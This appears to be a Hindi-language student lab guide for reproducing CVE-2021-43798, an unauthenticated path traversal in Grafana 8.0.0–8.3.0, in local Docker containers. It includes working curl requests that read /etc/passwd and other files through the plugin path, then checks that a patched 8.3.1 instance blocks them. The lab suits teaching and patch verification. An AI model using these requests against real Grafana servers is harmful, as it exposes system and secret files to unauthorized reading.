
CVE-2021-43798 Grafana अनधिकृत पथ ट्रैवर्सल - सुरक्षा प्रयोगशाला | शिवम गुप्ता | 23104003
केवल शैक्षिक उपयोग के लिए। इस लैब को केवल एक पृथक स्थानीय मशीन पर चलाएँ। इसे कभी भी इंटरनेट पर उजागर न करें।
| फ़ील्ड | विवरण |
|---|---|
| CVE ID | CVE-2021-43798 |
| उत्पाद | Grafana |
| प्रभावित संस्करण | 8.0.0 – 8.3.0 |
| पैच किया गया संस्करण | 8.3.1+ |
| गंभीरता | उच्च |
| CVSS v3.1 स्कोर | 7.5 |
| CWE | CWE-22 — पथ ट्रैवर्सल |
| प्रमाणीकरण आवश्यक | कोई नहीं |
| हमला वेक्टर | नेटवर्क |
git clone https://github.com/YOUR_USERNAME/INE_Shivam_Gupta.git
cd INE_Shivam_Gupta
docker compose up -d
सत्यापित करें:
curl http://127.0.0.1:3000/api/health
# Expected: "version": "8.3.0"
http://127.0.0.1:3000 खोलें — लॉगिन: admin / admin
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/passwd"
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/lab_secret.txt"
अपेक्षित: फ़ाइल सामग्री HTTP 200 के साथ लौटाई गई — किसी प्रमाणीकरण की आवश्यकता नहीं।
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/hostname"
curl.exe http://127.0.0.1:3000/api/health
यदि hostname लौटाया जाता है → कमजोर। संस्करण 8.0.0–8.3.0 → कमजोर।
पैच किया गया इंस्टेंस प्रारंभ करें (Grafana 8.3.1):
docker compose -f docker-compose.patched.yml up -d
सत्यापित करें कि शोषण अवरुद्ध है:
curl.exe --path-as-is "http://127.0.0.1:3001/public/plugins/alertlist/../../../../../../../../../etc/passwd"
# Expected: {"message": "Plugin file not found"}
docker compose down
docker compose -f docker-compose.patched.yml down